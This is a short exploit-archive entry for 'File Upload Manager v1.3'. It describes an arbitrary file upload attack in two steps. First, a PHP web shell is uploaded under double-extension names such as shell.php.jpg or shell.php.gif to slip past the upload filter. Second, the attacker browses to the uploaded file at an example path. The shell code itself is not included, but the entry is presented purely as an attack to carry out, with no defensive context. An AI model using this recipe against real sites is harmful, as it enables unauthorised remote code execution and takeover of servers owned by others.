id: 10897
date: 02/14/2010
title: File Upload Manager v1.3 exploit
author: ROOT_EGY
cves: 

================================
File Upload Manager v1.3 exploit
================================

# Version: v1.3

============================================================
 
 
1- upload shell with:
 
shell.php.jpg
shell.php.gif
shell.php.htm
shell.htm
shell.php.jpeg
shell.php.bmp
 
2- Go to shell link :
 
Example : http://www.site.com/path/store/shell.php.gif
 
 
==========================================================



#  0day.today [2023-03-22]  #